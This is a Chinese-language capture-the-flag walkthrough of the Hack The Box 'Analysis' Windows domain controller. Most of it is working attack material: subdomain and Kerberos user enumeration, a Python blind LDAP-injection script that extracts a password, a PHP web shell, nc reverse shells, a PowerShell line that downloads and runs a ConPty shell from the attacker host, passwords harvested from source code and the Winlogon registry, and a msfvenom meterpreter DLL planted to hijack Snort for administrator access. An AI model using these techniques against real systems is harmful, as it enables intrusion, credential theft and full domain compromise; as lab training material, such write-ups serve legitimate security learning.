靶场信息

信息收集

Nmap

┌──(root㉿kali)-[~]
└─# nmap -sC -sV -A -p- --min-rate=10000 10.10.11.250
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-19 08:41 CST
Warning: 10.10.11.250 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.250
Host is up (0.37s latency).
Not shown: 64232 closed tcp ports (reset), 1277 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-19 00:41:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3306/tcp  open  mysql         MySQL (unauthorized)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, NotesRPC, TLSSessionReq, X11Probe: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49792/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.94SVN%I=7%D=2/19%Time=65D2A3C4%P=x86_64-pc-linux-gnu%
SF:r(GenericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0
SF:\0\0\x0b\x08\x05\x1a\0")%r(HTTPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0"
SF:)%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVersionBindReqTCP,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2B,"\x05\0\0\0\x
SF:0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20messa
SF:ge\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServ
SF:erCookie,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20m
SF:essage\"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBP
SF:rogNeg,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\
SF:"\x05HY000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LD
SF:APBindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\x08\x01\x10\x88
SF:'\x1a\*Parse\x20error\x20unserializing\x20protobuf\x20message\"\x05HY00
SF:0")%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05
SF:\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x0
SF:1\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(oracle-tns,32,"\x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88
SF:'\x1a\x16Invalid\x20message-frame\.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/19%OT=53%CT=1%CU=33427%PV=Y%DS=2%DC=T%G=Y%TM=65D2
OS:A42C%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10D%TI=I%CI=I%II=I%TS=U)
OS:SEQ(SP=108%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=O%TS=U)SEQ(SP=108%GCD=2%ISR=1
OS:0D%TI=I%CI=I%II=I%SS=O%TS=U)OPS(O1=M542NW8NNS%O2=M542NW8NNS%O3=M542NW8%O
OS:4=M542NW8NNS%O5=M542NW8NNS%O6=M542NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFF
OS:F%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M542NW8NNS%CC=Y%Q=)T1(R=Y%D
OS:F=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0
OS:%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=
OS:A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=
OS:Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=A
OS:R%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%R
OS:UD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-02-19T00:43:07
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   343.23 ms 10.10.16.1
2   173.40 ms 10.10.11.250

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.29 seconds

去加一个 hosts 解析

echo "10.10.11.250 analysis.htb" >> /etc/hosts

然后去访问一下

Fuzz

是个静态页面,并没有东西,去 fuzz 一下子域名

┌──(root㉿kali)-[~]
└─# ffuf -u "http://analysis.htb/" -H "Host:FUZZ.analysis.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://analysis.htb/
 :: Wordlist         : FUZZ: /Users/lucifiel/Documents/Penetration/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.analysis.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

internal                [Status: 403, Size: 1268, Words: 74, Lines: 30, Duration: 479ms]
:: Progress: [4989/4989] :: Job [1/1] :: 24 req/sec :: Duration: [0:02:17] :: Errors: 0 ::

去加一个子域名

echo "10.10.11.250 internal.analysis.htb" >> /etc/hosts

然后再去访问一下

显示没有权限,那我们直接去 fuzz 一下目录

┌──(root㉿kali)-[~]
└─# ffuf -u "http://internal.analysis.htb/employees/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fc 403 -e .php,.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://internal.analysis.htb/employees/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 403
________________________________________________

login.php               [Status: 200, Size: 1085, Words: 413, Lines: 30, Duration: 347ms]
Login.php               [Status: 200, Size: 1085, Words: 413, Lines: 30, Duration: 326ms]

去访问一下

总算有可以访问的了

漏洞利用

复制一个用户名字典出来修改一下

cp /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt user.txt
sed -i "s|$|@analysis.htb|" user.txt

下载个kerbrute脚本

https://github.com/ropnop/kerbrute/releases/

然后去爆破一下

┌─┤(root㉿kali)-[~]
└─# ./kerbrute userenum -d analysis.htb user.txt --dc analysis.htb

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/19/24 - Ronnie Flathers @ropnop

2024/02/19 10:31:58 >  Using KDC(s):
2024/02/19 10:31:58 >   analysis.htb:88

2024/02/19 10:31:58 >  [+] VALID USERNAME:       cwilliams@analysis.htb
2024/02/19 10:31:58 >  [+] VALID USERNAME:       jangel@analysis.htb
2024/02/19 10:31:58 >  [+] VALID USERNAME:       AJohnson@analysis.htb
2024/02/19 10:31:58 >  [+] VALID USERNAME:       ajohnson@analysis.htb
2024/02/19 10:31:58 >  [+] VALID USERNAME:       JDoe@analysis.htb
2024/02/19 10:31:58 >  [+] VALID USERNAME:       technician@analysis.htb
2024/02/19 10:31:58 >  [+] VALID USERNAME:       wsmith@analysis.htb

将 fuzz 出来的用户名保存起来

访问http://internal.analysis.htb/users/list.php

┌─┤(root㉿kali)-[~]
└─# curl http://internal.analysis.htb/users/list.php
missing parameter

缺少了参数

补上以后,得到了一个用户名和一个表格

猜测应该是 ldap 注入

找到了大佬写的脚本

import argparse
import requests
import urllib.parse

def main():
    charset_path = "/usr/share/seclists/Fuzzing/alphanum-case-extra.txt"
    base_url = "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={found_char}{FUZZ}*)"
    found_chars = ""
    skip_count = 6
    add_star = True
    with open(charset_path, 'r') as file:
        for char in file:
            char = char.strip()
            # URL encode the character
            char_encoded = urllib.parse.quote(char)
            # Check if '*' is found and skip the first 6 '*' characters
            if '*' in char and skip_count > 0:
                skip_count -= 1
                continue
            # Add '*' after encountering it for the first time
            if '*' in char and add_star:
                found_chars += char
                print(f"[+] Found Password: {found_chars}")
                add_star = False
                continue
            modified_url = base_url.replace("{FUZZ}", char_encoded).replace("{found_char}", found_chars)
            response = requests.get(modified_url)
            if "technician" in response.text and response.status_code == 200:
                found_chars += char
                print(f"[+] Found Password: {found_chars}")
                file.seek(0, 0)
if __name__ == "__main__":
    main()
┌──(root㉿kali)-[~]
└─# python3 poc.py 
[+] Found Password: 9
[+] Found Password: 97
[+] Found Password: 97N
[+] Found Password: 97NT
[+] Found Password: 97NTt
[+] Found Password: 97NTtl
[+] Found Password: 97NTtl*
[+] Found Password: 97NTtl*4
[+] Found Password: 97NTtl*4Q
[+] Found Password: 97NTtl*4QP
[+] Found Password: 97NTtl*4QP9
[+] Found Password: 97NTtl*4QP96
[+] Found Password: 97NTtl*4QP96B
[+] Found Password: 97NTtl*4QP96Bv

得到了一个密码

username = technician@analysis.htb
passwrod = 97NTtl*4QP96Bv

登录成功

前往 SOC Report 上传一个 webshell

<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>

我们之前 fuzz 的时候找到了文件上传的目录,直接访问即可

┌──(root㉿kali)-[~]
└─# curl http://internal.analysis.htb/dashboard/uploads/web.php?cmd=whoami
<pre>analysis\svc_web
</pre>

现在来反弹个shell

nc -nvlp 4444

然后我们利用上传功能传个nc上去

然后反弹即可

http://internal.analysis.htb/dashboard/uploads/web.php?cmd=nc64.exe 10.10.16.10 4444 -e cmd
┌──(root㉿kali)-[~]
└─# rlwrap nc -nvlp 4444                             
listening on [any] 4444 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.11.250] 59341
Microsoft Windows [version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. Tous droits r�serv�s.

C:\inetpub\internal\dashboard\uploads>whoami
whoami
analysis\svc_web

成功获得一个shell

权限提升

WebService

通过到处乱翻,在 C:\inetpub\internal\users\list.php 中找到了一个账号密码

$ldap_password = 'N1G6G46G@G!j';
$ldap_username = 'webservice@analysis.htb';
$ldap_connection = ldap_connect("analysis.htb");

我们需要上传一个RunasCs上去提权

wget https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip

再准备一个 Invoke-ConPtyShell.ps1

https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1

然后再开一个 nc

stty raw -echo; (stty size; cat) | nc -lvnp 5555

用python3开一个http服务

python3 -m http.server 80

然后执行

RunasCs.exe "webservice" "N1G6G46G@G!j" "powershell.exe -c IEX(IWR -UseBasicParsing 'http://10.10.16.10/Invoke-ConPtyShell.ps1'); Invoke-ConPtyShell -RemoteIp 10.10.16.10 -RemotePort 5555 -Rows 120 -Cols 38 -CommandLine cmd.exe" -d "analysis.htb"
Microsoft Windows [version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. Tous droits réservés.

C:\Windows\system32>whoami
analysis\webservice

C:\Windows\system32>hostname
DC-ANALYSIS

成功获得webservice权限

user

查看注册表,可以得到一个密码

C:\Windows\system32>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    analysis.htb.
    DefaultUserName    REG_SZ    jdoe
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    ShellAppRuntime    REG_SZ    ShellAppRuntime.exe
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x1ab910533
    ShutdownFlags    REG_DWORD    0x13
    DisableLockWorkstation    REG_DWORD    0x0
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    7y4Z4^*y9Zzj
    AutoLogonSID    REG_SZ    S-1-5-21-916175351-3772503854-3498620144-1103
    LastUsedUsername    REG_SZ    jdoe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
password = 7y4Z4^*y9Zzj

将我们之前kerbrute枚举出来的用户名保存下来,用crackmapexec进行验证

┌──(root㉿kali)-[~]
└─# crackmapexec winrm 10.10.11.250 -u user.txt -p '7y4Z4^*y9Zzj'
SMB         10.10.11.250    5985   DC-ANALYSIS      [*] Windows 10.0 Build 17763 (name:DC-ANALYSIS) (domain:analysis.htb)
HTTP        10.10.11.250    5985   DC-ANALYSIS      [*] http://10.10.11.250:5985/wsman
WINRM       10.10.11.250    5985   DC-ANALYSIS      [-] analysis.htb\ajohnson:7y4Z4^*y9Zzj
WINRM       10.10.11.250    5985   DC-ANALYSIS      [-] analysis.htb\cwilliams:7y4Z4^*y9Zzj
WINRM       10.10.11.250    5985   DC-ANALYSIS      [-] analysis.htb\wsmith:7y4Z4^*y9Zzj
WINRM       10.10.11.250    5985   DC-ANALYSIS      [-] analysis.htb\jangel:7y4Z4^*y9Zzj
WINRM       10.10.11.250    5985   DC-ANALYSIS      [-] analysis.htb\technician:7y4Z4^*y9Zzj
WINRM       10.10.11.250    5985   DC-ANALYSIS      [+] analysis.htb\JDoe:7y4Z4^*y9Zzj (Pwn3d!)

然后去连接

┌──(root㉿kali)-[~]
└─# evil-winrm -i 10.10.11.250 -u jdoe -p '7y4Z4^*y9Zzj'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jdoe\Documents> whoami
analysis\jdoe

成功提权到 user

*Evil-WinRM* PS C:\Users\jdoe\Desktop> type user.txt
86e4a40890c7c6dc38234f462b9e23c0

成功拿到 user 权限的 flag 文件

Root

*Evil-WinRM* PS C:\snort\lib> icacls snort_dynamicpreprocessor
snort_dynamicpreprocessor AUTORITE NT\SystŠme:(I)(OI)(CI)(F)
                          BUILTIN\Administrateurs:(I)(OI)(CI)(F)
                          BUILTIN\Utilisateurs:(I)(OI)(CI)(RX)
                          BUILTIN\Utilisateurs:(I)(CI)(AD)
                          BUILTIN\Utilisateurs:(I)(CI)(WD)
                          CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

在 C:\snort\lib 目录下使用 icacls 可以看到,AUTORITE NT\SystŠme 用户拥有完全的控制权限

经过搜索,发现 snort 是一个 IPS(开源入侵防御系统)设备,其中 Snort\lib\snort_dynamicpreprocessor 目录是增强 snort 软件使用的模块,也可以自定义模块,所以这里我们自己创建一个恶意的 dll 上传,替换掉其中的 sf_engine.dll 即可

┌──(root㉿kali)-[~]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.10 LPORT=4444 -f dll -o sf_engine.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: sf_engine.dll
*Evil-WinRM* PS C:\snort\lib\snort_dynamicpreprocessor> upload /root/sf_engine.dll
                                        
Info: Uploading /root/sf_engine.dll to C:\snort\lib\snort_dynamicpreprocessor\sf_engine.dll
                                        
Data: 12288 bytes of 12288 bytes copied
                                        
Info: Upload successful!
┌──(root㉿kali)-[~]
└─# msfconsole                                                                                          
Metasploit tip: Use the analyze command to suggest runnable modules for 
hosts
                                                  
 ______________________________________
/ it looks like you're trying to run a \
\ module                               /
 --------------------------------------
 \
  \
     __
    /  \
    |  |
    @  @
    |  |
    || |/
    || ||
    |\_/|
    \___/


       =[ metasploit v6.3.43-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.10
lhost => 10.10.16.10
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 10.10.16.10:4444

然后等着就行

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.16.10:4444 
[*] Sending stage (200774 bytes) to 10.10.11.250
[*] Meterpreter session 1 opened (10.10.16.10:4444 -> 10.10.11.250:49323) at 2024-01-20 19:38:36

meterpreter > shell
Process 6980 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
analysis\administrateur

C:\Windows\system32>cd C:\Users\Administrateur\Desktop
cd C:\Users\Administrateur\Desktop

C:\Users\Administrateur\Desktop>type root.txt
type root.txt
dc980376fb1d18a0c7c6dc38234